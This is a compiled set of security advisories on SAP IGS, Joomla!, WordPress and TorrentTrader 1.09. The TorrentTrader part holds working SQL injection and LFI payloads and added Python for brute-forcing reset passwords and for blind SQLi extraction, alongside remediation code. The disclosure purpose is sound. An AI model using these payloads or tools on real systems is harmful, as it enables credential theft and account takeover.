"GotNowhere" collected and contributed these eight pieces on "SAP Internet Graphics Server multiple remote security vulnerabilities" to this site; the editor's compilation follows.
Part 1: SAP Internet Graphics Server Multiple Remote Security Vulnerabilities
Affected systems:
SAP Internet Graphics Server 7.00 Patchlevel <= 6
SAP Internet Graphics Server 6.40 Patchlevel <= 16
Unaffected systems:
SAP Internet Graphics Server 7.00 Patchlevel 7
SAP Internet Graphics Server 6.40 Patchlevel 17
Description:
BUGTRAQ ID: 21449, 21448
Internet Graphics Server (IGS) is a component of the SAP R/3 enterprise environment that provides graphics services.
Multiple security vulnerabilities exist in the IGS implementation; a remote attacker could exploit them to obtain sensitive information or perform unauthorised malicious operations.
A remote attacker can delete arbitrary files on the system by submitting a specially crafted HTTP request to SAP IGS.
In addition, a remote attacker can use certain functions of SAP IGS to shut down the server, access configuration files, or perform other unauthorised operations.
<*Source: Mariano Nuñez Di Croce (mnunez@cybsec.com)
Links: secunia.com/advisories/23262/
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf
*>
Recommendations:
Vendor patch: SAP
---
The vendor has released a patch for this issue; download it from the vendor's home page:
www.sap.com/
Part 2: Joomla! Multiple Remote Security Vulnerabilities
Affected systems: Joomla! < 1.0.11
Unaffected systems: Joomla! 1.0.11
Description:
Joomla! is an open-source content management system (CMS). Joomla! contains multiple cross-site scripting and security-restriction bypass vulnerabilities:
1) Input validation errors exist in the mosMail and JosIsValidEmail() functions.
2) A security vulnerability exists in PEAR.php.
3) globals.php is not included in administrator/index.php.
4) Insufficient access-control checks, caused by a missing defined('_VALID_MOS') check and by errors in the Admin "Upload Image", Admin "Popups" and "com_content" functionality.
5) Vulnerabilities in the do_pdf functionality and in the handling of the emailform task of com_content allow users to bypass the authentication process.
6) Input to the Admin "Module Manager", Admin "Help" and Search functionality is not properly filtered before being returned to the user, allowing arbitrary HTML and script code to execute in the user's browser.
<*Source: Joomla!
Link: secunia.com/advisories/21666/
*>
Recommendations:
Vendor patch: Joomla!
-------
The vendor has released a patch for this issue; download it from the vendor's home page:
forge.joomla.org/sf/frs/do/viewRelease/projects.joomla/frs.joomla_1_0.1_0_11
Part 3: WordPress Multiple Remote Security Vulnerabilities
Affected systems:
WordPress 2.2.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25161
WordPress is a free blogging system.
WordPress contains multiple input validation vulnerabilities in its handling of user-submitted data; a remote attacker could exploit them for cross-site scripting, SQL injection, or to gather sensitive information.
The themes.php, options.php, link-import.php and upload.php scripts contain cross-site scripting vulnerabilities; options.php additionally contains SQL injection and information disclosure vulnerabilities.
<*Link: mybeni.rootzilla.de/mybeNi//wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea
*>
Recommendations:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
wordpress.org/
Source: NSFOCUS
Part 4: TorrentTrader Classic Multiple Remote Security Vulnerabilities
Source: hacknote.com
Published: -06-15
Test method:
[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
===============================================================================
Author: Janek Vind “waraxe”
Date: 15. June 2009
Location: Estonia, Tartu
Web: www.waraxe.us/advisory-74.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TorrentTrader is a feature-packed and highly customisable PHP/MySQL-based
BitTorrent tracker, featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.
sourceforge.net/projects/torrenttrader
List of found vulnerabilities
===============================================================================
1. Sql Injection vulnerability in “account-inbox.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “origmsg” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Test:
localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
Result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
if ($msg) {
    $msg = trim($msg);
    $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=" . sqlesc($receiver) . "");
    $user = mysql_fetch_assoc($res);
    if (!$user)
        $message = "Username not found.";
    ...
    // $origmsg is interpolated into the query without sqlesc(): the injection point
    if ($origmsg && $delete == "yes")
        mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
-----------------------------[source code end]---------------------------------
2. Weak password generation algorithm in “account-recover.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. generated password is weak and can be easily bruteforced
Preconditions:
1. attacker must know email address associated with target's account
TorrentTrader contains password-reset functionality:
localhost/torrenttrader109/account-recover.php
Anyone can initiate a password reset; the only condition is that the target's email
address must be known. TorrentTrader checks the email address and, after successful
validation, generates a new temporary password and sends it to that email address.
The autogenerated password is a random integer between 10000 and 50000, so there
are only about 40000 possible temporary passwords. It is easy to write a brute-force
script that tries every possible password. This process can take a couple of hours
or more, but eventually the password will be guessed and the target account is
compromised.
-----------------------------[source code start]-------------------------------
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
    $email = trim($_POST["email"]);
    if (!validemail($email)) {
        $msg = "" . NOT_VAILD_EMAIL . "";
        $kind = "Error";
    }
    else {
        $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
        $arr = mysql_fetch_assoc($res);
        if (!$arr) {
            $msg = "" . EMAIL_INVALID . "";
            $kind = "Error";
        }
    ...
    if ($arr) {
        // only 40001 possible values, from a non-cryptographic PRNG
        $newpassword = rand(10000, 50000);
        $md5pass = md5($newpassword);
-----------------------------[source code end]---------------------------------
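To put numbers on the weakness above, the following Python is added here as an illustration; it is not part of the advisory or of TorrentTrader. It re-creates the rand(10000, 50000) keyspace, runs the offline brute force an attacker holding a stolen md5 hash would run, estimates the online cost the advisory mentions, and shows a CSPRNG-based replacement. The stolen hash value, the assumed login rate and the 62-symbol alphabet of the replacement are my assumptions, not facts from the advisory.

```python
import hashlib
import math
import secrets
import string
from typing import Optional

# account-recover.php does: $newpassword = rand(10000, 50000); $md5pass = md5($newpassword);
LOW, HIGH = 10000, 50000


def keyspace_size() -> int:
    """Distinct temporary passwords rand(10000, 50000) can produce (both ends inclusive)."""
    return HIGH - LOW + 1


def entropy_bits() -> float:
    """Guessing entropy of the temporary password, in bits."""
    return math.log2(keyspace_size())


def md5_hex(value: str) -> str:
    """The same transform the tracker stores: md5 of the decimal string."""
    return hashlib.md5(value.encode("ascii")).hexdigest()


def brute_force_md5(target_hash: str) -> Optional[int]:
    """Offline attack: test every candidate against a stolen md5 hash.

    Returns the temporary password, or None if the hash is not from this keyspace.
    """
    for candidate in range(LOW, HIGH + 1):
        if md5_hex(str(candidate)) == target_hash:
            return candidate
    return None


def online_worst_case_hours(attempts_per_second: float) -> float:
    """Online attack: hours to exhaust the keyspace against the login form
    (assumption: no lockout or rate limiting, which the advisory does not mention)."""
    return keyspace_size() / attempts_per_second / 3600


# Hardened replacement (my suggestion, not TorrentTrader code): CSPRNG output
# over a 62-symbol alphabet gives about 5.95 bits per character.
ALPHABET = string.ascii_letters + string.digits


def generate_temp_password(length: int = 16) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def temp_password_bits(length: int = 16) -> float:
    return length * math.log2(len(ALPHABET))


if __name__ == "__main__":
    stolen = md5_hex("31337")  # constructed: the hash of one possible reset password
    print("keyspace:", keyspace_size(), "entropy bits: %.1f" % entropy_bits())
    print("recovered:", brute_force_md5(stolen))
    print("online, 5 attempts/s: %.1f hours" % online_worst_case_hours(5))
    print("replacement:", generate_temp_password(), "bits: %.1f" % temp_password_bits())
```

The offline loop finishes in well under a second; the online figure is what the advisory's "couple of hours" corresponds to at a modest five attempts per second, which is why the fix has to be a larger keyspace and not just rate limiting.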
3. Unauthorized database backup vulnerability in “backup-database.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. mysqldump utility must be available
2. gzip utility must be available
3. target directory must be writable
4. database name must be known in order to successfully guess archive filename
Test:
localhost/torrenttrader109/backup-database.php
Resulting message: “Database backup successful, entry inserted into database.”
-----------------------------[source code start]-------------------------------
system(sprintf(
'mysqldump --opt -h %s -u %s -p%s %s | gzip >%s/%s/%s-%s-%s-%s.gz',
$host,
$user,
$pass,
$db,
getenv('DOCUMENT_ROOT'),
$backupdir,
$db,
$day,
$month,
$year
));
-----------------------------[source code end]---------------------------------
The attacker can trigger a database backup, and the resulting "gz" archive's
filename can be guessed if the database name is known. The file is also directly
downloadable from the website. Example download URI:
localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
The result is information leakage: for example, the attacker can fetch admin
credentials from the backed-up database. Note also that the database password is
passed to mysqldump on the command line (-p%s), so it is visible in the process
list for the duration of the backup.
4. Sql Injection vulnerability in “browse.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “wherecatin” is used in sql query
Preconditions:
1. none
Test:
localhost/torrenttrader109/browse.php?wherecatin=waraxe
Result:
Unknown column 'waraxe' in 'where clause'
-----------------------------[source code start]-------------------------------
if (count($wherecatina) > 1)
    $wherecatin = implode(",", $wherecatina);
elseif (count($wherecatina) == 1)
    $wherea[] = "category = $wherecatina[0]";
...
// $wherecatin is never initialised on this path, so it can be supplied from the request (see the test URL above)
if ($wherecatin)
    $where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";
if ($where != "")
    $where = "WHERE $where";
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------
This specific SQL injection vulnerability can be exploited using blind attack
methods. If there are one or more active torrents in the database, the attack
pattern below is usable:
localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
and we see the found torrents.
localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
"No torrents were found based on your search criteria."
In this way the attacker can ask the database boolean questions and retrieve the
needed information bit by bit: an example of classic blind SQL injection.
If there are no active torrents in the database, the induced-SQL-error method can be used instead:
localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
"Subquery returns more than 1 row"
localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
"No torrents were found based on your search criteria."
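To make the bit-by-bit extraction concrete, here is an added Python example of mine, not code from the advisory or from TorrentTrader. It builds the same `0) OR IF(<cond>,1,2)=(SELECT 1` payloads shown above and drives them with a binary search against a simulated browse.php oracle. The simulated back end, its sample @@version string, and the two condition shapes it understands (LENGTH(@@version)>n and ASCII(SUBSTRING(@@version,i,1))>n) are constructed for the example; against a live target, `fake_tracker` would be replaced by an HTTP request that checks the response for the "No torrents were found" string.

```python
import re
from typing import Callable, Tuple

# Constructed stand-in for the target: the real browse.php evaluates the injected
# expression inside "category IN(...)" and either lists torrents or prints
# "No torrents were found based on your search criteria." Here a regex-based
# evaluator answers the two condition shapes the extractor sends.
SECRET_VERSION = "5.0.51b-community-nt"  # constructed sample value of @@version

_PAYLOAD = re.compile(r"^0\) OR IF\((.+),1,2\)=\(SELECT 1$")
_LEN = re.compile(r"^LENGTH\(@@version\)>(\d+)$")
_CHR = re.compile(r"^ASCII\(SUBSTRING\(@@version,(\d+),1\)\)>(\d+)$")


def payload(cond: str) -> str:
    """The advisory's shape: wherecatin=0) OR IF(<cond>,1,2)=(SELECT 1 (URL-encoded on the wire)."""
    return f"0) OR IF({cond},1,2)=(SELECT 1"


def fake_tracker(wherecatin: str) -> bool:
    """True if torrents would be listed, i.e. IF(cond,1,2) evaluated to 1, i.e. cond is true."""
    m = _PAYLOAD.match(wherecatin)
    if not m:
        raise ValueError("unexpected payload shape: " + wherecatin)
    cond = m.group(1)
    lm = _LEN.match(cond)
    if lm:
        return len(SECRET_VERSION) > int(lm.group(1))
    cm = _CHR.match(cond)
    if cm:
        pos, threshold = int(cm.group(1)), int(cm.group(2))
        return ord(SECRET_VERSION[pos - 1]) > threshold
    raise ValueError("unsupported condition: " + cond)


def binary_search(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Find v in [lo, hi] given an oracle that answers 'is v > n?'. About log2(hi - lo) queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_version(send: Callable[[str], bool], max_len: int = 64) -> str:
    """Recover @@version one character at a time through the boolean oracle."""
    length = binary_search(lambda n: send(payload(f"LENGTH(@@version)>{n}")), 0, max_len)
    chars = []
    for i in range(1, length + 1):
        ask = lambda n, i=i: send(payload(f"ASCII(SUBSTRING(@@version,{i},1))>{n}"))
        chars.append(chr(binary_search(ask, 0, 127)))
    return "".join(chars)


def extract_with_count(send: Callable[[str], bool]) -> Tuple[str, int]:
    """Same extraction, also counting how many requests it cost."""
    count = 0

    def counted(p: str) -> bool:
        nonlocal count
        count += 1
        return send(p)

    return extract_version(counted), count


if __name__ == "__main__":
    version, requests = extract_with_count(fake_tracker)
    print(f"@@version = {version!r} recovered in {requests} requests")
```

Each character costs about seven requests, so a 20-byte string is recovered in under 150 requests; the same `extract_version` works unchanged with the error-based variant described above, provided `send` returns True when the page does not show the "Subquery returns more than 1 row" error.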
5. Information leakage in “check.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. none
Test:
localhost/torrenttrader109/check.php
This script is originally meant to be used by the installer and later by admins.
Because of the lack of access control, an attacker is able to use it to gather some
useful information about the target system: the full path to the webroot, file and
directory permissions of specific files, and a couple of PHP settings.
6. Sql Injection vulnerability in “delreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “categ” is used in sql query
Preconditions:
1. attacker must have at least super moderator privileges (user class >3)
Comments:
1. very easy to exploit
Test:
localhost/torrenttrader109/delreq.php?categ=waraxe
Result:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1
Test 2:
localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
and we can see all usernames, password hashes and emails from database.
7. Sql Injection vulnerability in “index.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “choice” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
2. there must exist at least one poll
Testing needs a custom-written HTML form:
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
    $choice = $_POST["choice"];
    // PHP 5 loose comparison: a string that merely starts with a digit passes both numeric checks
    if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
    {
        $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
        $arr = mysql_fetch_assoc($res) or die("No poll");
        $pollid = $arr["id"];
        $userid = $CURUSER["id"];
        $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
        $arr = mysql_fetch_assoc($res);
        if ($arr) die("Dupe vote");
        mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
-----------------------------[source code end]---------------------------------
8. Sql Injection vulnerability in “modrules.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “id” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
Testing needs a custom-written HTML form:
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Test result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
elseif ($_GET["act"] == "edited") {
    $id = $_POST["id"];   // the only field not passed through sqlesc()
    $title = sqlesc($_POST["title"]);
    $text = sqlesc($_POST["text"]);
    $public = sqlesc($_POST["public"]);
    $class = sqlesc($_POST["class"]);
    mysql_query("update rules set title=$title, text=$text, public=$public,
        class=$class where id=$id") or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------
9. Information leakage in “phpinfo.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. none
Test:
localhost/torrenttrader109/phpinfo.php
-----------------------------[source code start]-------------------------------
phpinfo();
?>
-----------------------------[source code end]---------------------------------
This script can be used by an attacker to obtain the output of the PHP function
phpinfo(). Access to such a script must be limited to admins, but currently there
is no access control at all.
10. Sql Injection vulnerabilities in “report.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “user” is used in sql query
2. unsanitized user submitted parameter “torrent” is used in sql query
3. unsanitized user submitted parameter “forumid” is used in sql query
4. unsanitized user submitted parameter “forumpost” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
The two proof-of-concept tests below use the parameter "user".
Test 1 needs a custom-written HTML form:
-------------------------------------------------------------------------------
1,(SELECT 1 UNION ALL SELECT 1),1)-- ">
-------------------------------------------------------------------------------
Test result: "MYSQL Error has occurred!"
Test 2 needs a custom-written HTML form:
-----------------------------[source code start]-------------------------------
50,(SELECT 1 UNION ALL SELECT 1),1)-- ">
-----------------------------[source code end]---------------------------------
Test result: "You have already reported user ..."
This is the classic blind SQL injection exploitation method and allows the attacker
to fetch information from the database bit by bit by asking boolean questions.
The other three SQL injection vulnerabilities in "report.php" involve the user-submitted
parameters "torrent", "forumid" and "forumpost"; exploitation can be done in the
same way as seen above.
11. Sql Injection vulnerability in “take-deletepm.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delmp” is used in sql query
Preconditions:
1. attacker must have admin privileges
-----------------------------[source code start]-------------------------------
if (isset($_POST["delmp"])) {
    // every array element is concatenated unescaped into the IN list
    $do = "DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
    $res = mysql_query($do);
-----------------------------[source code end]---------------------------------
12. Sql Injection vulnerability in “takedelreport.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delreport” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
$res = mysql_query("SELECT id FROM reports WHERE dealtwith=0
    AND id IN (" . implode(", ", $_POST[delreport]) . ")");
-----------------------------[source code end]---------------------------------
13. Sql Injection vulnerability in “takedelreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delreq” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
-----------------------------[source code start]-------------------------------
if (get_user_class() > UC_JMODERATOR) {
    ...
    $do = "DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
    $do2 = "DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
    $res2 = mysql_query($do2);
    $res = mysql_query($do);
    ...
} else {
    foreach ($_POST[delreq] as $del_req) {
        // the ownership check itself interpolates $del_req unescaped
        $delete_ok = checkRequestOwnership($CURUSER[id], $del_req);
        if ($delete_ok) {
            $do = "DELETE FROM requests WHERE id IN ($del_req)";
            $do2 = "DELETE FROM addedrequests WHERE requestid IN ($del_req)";
...
function checkRequestOwnership($user, $delete_req) {
    $query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
-----------------------------[source code end]---------------------------------
14. Sql Injection vulnerability in “takestaffmess.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “clases” is used in sql query
Preconditions:
1. attacker must have admin privileges
-----------------------------[source code start]-------------------------------
adminonly();
...
$updateset = $_POST['clases'];
$query = mysql_query("SELECT id FROM users WHERE class IN (" . implode(",", $updateset) . ")");
-----------------------------[source code end]---------------------------------
15. Sql Injection vulnerability in “takewarndisable.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “warndisable” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
...
if ($disable != '') {
    $do = "UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
    $res = mysql_query($do);
}
if ($enable != '') {
    $do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
    $res = mysql_query($do);
}
-----------------------------[source code end]---------------------------------
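Items 11 through 15 share one pattern: an array taken from $_POST is implode()d straight into an IN (...) list. The following Python re-creation is added here and is not taken from TorrentTrader or from the advisory. It runs the vulnerable query shape against an in-memory SQLite table with constructed rows, then shows the parameterised alternative that validates every id as a plain integer and binds one placeholder per value. The table layout, the sample rows and the attacker input are assumptions made for the example; the injected string ends in "-- " with a trailing space so that it is a comment in both SQLite and MySQL.

```python
import sqlite3
from typing import Iterable, List

# Constructed stand-in for TorrentTrader's messages table (columns are assumptions).
SAMPLE_ROWS = [(1, "alice", "hi"), (2, "alice", "re: hi"), (3, "bob", "private")]


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, receiver TEXT, msg TEXT)")
    con.executemany("INSERT INTO messages VALUES (?, ?, ?)", SAMPLE_ROWS)
    con.commit()
    return con


def delete_vulnerable(con: sqlite3.Connection, delmp: Iterable[str]) -> int:
    """Same shape as take-deletepm.php: implode(", ", $_POST[delmp]) dropped into IN (...).

    Returns the number of rows deleted.
    """
    sql = "DELETE FROM messages WHERE id IN (" + ", ".join(delmp) + ")"
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def delete_hardened(con: sqlite3.Connection, delmp: Iterable[str]) -> int:
    """Validate every id as a plain integer, then bind one placeholder per value."""
    ids: List[int] = []
    for raw in delmp:
        if not raw.isdigit():
            raise ValueError(f"bad message id: {raw!r}")
        ids.append(int(raw))
    if not ids:
        return 0
    placeholders = ", ".join("?" for _ in ids)
    cur = con.execute(f"DELETE FROM messages WHERE id IN ({placeholders})", ids)
    con.commit()
    return cur.rowcount


def hardened_rejects(con: sqlite3.Connection, delmp: Iterable[str]) -> bool:
    """True if the hardened version refused the input (and therefore deleted nothing)."""
    try:
        delete_hardened(con, delmp)
    except ValueError:
        return True
    return False


def remaining(con: sqlite3.Connection) -> int:
    return con.execute("SELECT COUNT(*) FROM messages").fetchone()[0]


# Constructed attacker input: the second "id" closes the IN list and appends OR 1=1.
# The trailing space after -- matters for MySQL, which needs whitespace after "--".
INJECTED = ["1", "2) OR 1=1 -- "]

if __name__ == "__main__":
    con = setup_db()
    print("vulnerable: deleted", delete_vulnerable(con, INJECTED), "rows, left", remaining(con))
    con = setup_db()
    print("hardened rejects:", hardened_rejects(con, INJECTED), "rows left", remaining(con))
```

The vulnerable form turns `DELETE ... WHERE id IN (1, 2) OR 1=1 -- )` into a table wipe, and the same join would serve UNION or subquery payloads where the result is displayed. The hardened form is the change to make in every one of the implode() call sites listed above; the per-user ownership check in item 13 additionally needs the same integer validation before `$del_req` reaches the query.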
16. Sql Injection vulnerability in “today.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “limit” is used in sql query
Preconditions:
1. none
Comments:
1. seems hard to exploit
Test:
localhost/torrenttrader109/today.php?limit=waraxe
Result:
“Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in C:apache_wwwroottorrenttrader109today.php on line 21”
17. Sql Injection vulnerability in “torrents-details.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “where” is used in sql query
Preconditions:
1. none
-----------------------------[source code start]-------------------------------
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
    WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------
Exploitation is possible using blind sql injection methods.
Test 1:
localhost/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Result: normal page
Test 2:
localhost/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Result: “MYSQL Error has occurred!”
18. Sql Injection vulnerability in “admin-delreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “categ” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
...
$res = mysql_query("SELECT users.username, requests.filled, requests.filledby,
    requests.id, requests.userid, requests.request, requests.added, categories.name
    as cat FROM requests inner join categories on requests.cat = categories.id
    inner join users on requests.userid = users.id
    $categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------
Test:
localhost/torrenttrader109/admin-delreq.php?categ=waraxe
Result: “You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near 'waraxe order by requests.request LIMIT 0,50' at line 1”
19. Persistent XSS in “viewrequests.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user
Steps for testing:
a) the attacker submits a request:
localhost/torrenttrader109/requests.php
In the "Title" field, insert some JavaScript:
testtitle
b) an admin browses the requests:
localhost/torrenttrader109/viewrequests.php
and the previously planted JavaScript is executed in the admin's session context.
20. Persistent XSS in logging functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user
Steps for testing:
a) the attacker uploads a torrent file:
localhost/torrenttrader109/torrents-upload.php
In the "Torrent Name" field, insert some JavaScript:
testname
The upload is successful: "The torrent has been uploaded successfully!"
b) an admin browses the logs:
localhost/torrenttrader109/admin.php?act=view_log
and the previously planted JavaScript is executed in the admin's session context.
21. Local File Inclusion vulnerability in “backend/admin-functions.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. URI case-insensitivity on Windows platform
Preconditions:
1. Windows platform
2. register_globals=on
3. magic_quotes_gpc=off
-----------------------------[source code start]-------------------------------
// case-sensitive check against a URI that Windows resolves case-insensitively
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
-----------------------------[source code end]---------------------------------
As we can see from the source code snippet above, direct access to the script is
blocked. On a Windows and Apache combination, URI handling is case-insensitive,
whereas the strpos() function used for access control is case-sensitive. So the
script can be executed directly if we change some characters of the script's
filename to uppercase:
localhost/torrenttrader109/backend/Admin-functions.php
"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:apache_wwwroottorrenttrader109backendadmin-functions.php on line 3"
If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible (the
%00 truncates the appended "/block.php" suffix):
localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
22. Reflected XSS in multiple scripts
